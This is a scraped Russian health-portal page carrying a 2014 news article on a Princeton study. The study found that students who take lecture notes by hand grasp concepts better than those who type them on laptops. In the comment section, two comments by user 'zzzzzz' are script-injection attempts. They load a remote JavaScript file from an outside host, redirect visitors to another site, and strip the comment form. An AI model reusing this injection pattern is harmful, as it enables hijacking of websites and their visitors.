Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как записывать лекции, чт...  >>  Как записывать лекции, чтобы потом их вспомнить?
 
Обратная связь
 

Как записывать лекции, чтобы потом их вспомнить?

Размер шрифта
27 мая 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Пришло время стряхнуть пыль с шариковых ручек и тетрадок в клеточку: недавнее исследование показало, что писать лекции от руки намного полезнее, чем на ноутбуке или планшете.

Как записывать лекции, чтобы потом их вспомнить?

Войдите в любой лекционный зал, и скорее всего вам представится следующая картина – большинство студентов скрылись за экранами своих ноутбуков, и лишь несколько человек, из разряда вымирающих, записывают лекцию на бумагу.

Использование компьютерной техники в ходе учебных занятий всегда было предметом противоречивых дискуссий. Во многом это связано с тем, что компьютер отвлекает студента от образовательного процесса, заманивая социальными сетями, видеоиграми и другими убийцами свободного времени. Однако немногие ученые задумывались о том, насколько эффективно использование ноутбука в том случае, когда студент не филонит, но исправно строчит лекцию.

«Обнаруженные нами данные указывают на то, что даже в случае использования ноутбука на лекции по прямому назначению (а не для покупки барахла в интернет-магазинах или переписки во Вконтакте), на качестве образовательного процесса это все равно сказывается не самым лучшим образом», – рассказывает Пэм Мюллер, психолог из Принстонского Университета (США), ведущий автор исследования.

Мюллер решила провести это исследование после того, как на собственном опыте ощутила переход с ноутбука на бумагу и ручку в ходе прохождения аспирантуры.

«Я почувствовала, что стала извлекать гораздо больше из материала лекции», – говорит Мюллер. «Мой коллега Дэниэл Оппенгеймер, с которым мы работали в то время, рассказывал об аналогичных впечатлениях. По его словам, однажды он конспектировал доклад на компьютере, а потом вдруг осознал, что не имеет ни малейшего понятия, о чем именно говорит человек».

Мюллер и Оппенгеймер решили облечь их впечатления в научную оболочку. Они провели серию экспериментов с участием 65 студентов колледжа с тем, чтобы проверить их гипотезу о неэффективности электронного конспекта.

Студентам была предложена серия лекций с интересным, но специфическим содержанием. Испытуемые были разделены на две группе: одни ребята конспектировали материал с помощью ноутбука (предусмотрительно отключенного от интернета), а другие – традиционным способом.

Спустя тридцать минут студенты должны были ответить на ряд вопросов относительно прослушанного материалы. Вопросы были как конкретно-фактические («В каком году случилось событие X?»), так и концептуально-абстрактные («В чем, по вашему, выразилось влияния события X на событие Y?»).

Оказалось, что студенты обеих групп на вопросы первого типа отвечали с сопоставимой эффективностью, тогда как в сфере концептуальных вопросов «ретрограды» значительно обошли любителей ноутбуков.

В целом электронные конспекты содержали больше слов, в том числе дословно повторяющих речь лектора, если сравнивать с конспектами бумажными. По всей видимости, в этом случае количество не перерастает в качество – «бездумная стенография» нивелирует потенциальные преимущества большего объема текста.

«Видимо, во время конспектирования на бумаге человек более избирательно подходит к фиксируемой информации, что позволяет им запоминать материал с большей эффективностью», – говорит Мюллер.

Удивительно, но аналогичные результаты были получены даже в том случае, когда студентов прямо просили не записывать за лектором дословно. Вероятно, эту тягу не так-то просто преодолеть.

Когда спустя две недели испытуемые вновь собрались и были опрошены на предмет усвоенного материала, преимущество снова оказалось на стороне бумаги и ручки.

«Поймите нас правильно, мы вовсе не ждем, что мир массово вернется в XX век к традиционному письму», – говорит Мюллер. «Сейчас на рынке доступны специальные планшеты и стилусы, которые имитируют обычное письмо. Подобные технологии должны сочетать в себе преимущества обоих методов».

Таким образом, не спешите выбрасывать тетрадку и ручку на свалку истории. Они еще свое послужат.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - pomk93

06 июня 2014 в 09:48

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:36

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Московский музей «Живые системы» приглашает всех   Селфи убивает больше людей, чем акулы!   Сколько можно выпить и не умереть?   Влияет ли политика на Евровидение?! Ученые выяснили, как раздаются голоса: читайте и делайте ставки!  
03 октября 2013Результаты благотворительного марафона «Всем миром» 12 июля 2013Как мы мжоем чтиать слвоа, кодга все бвукы перпуетнаы?
 
08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 

Слайдшоу

1
Вы задохнетесь у себя дома, если не сделаете этого!
Как выглядит аллергия
Можно ли пережить беременность без рвоты?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.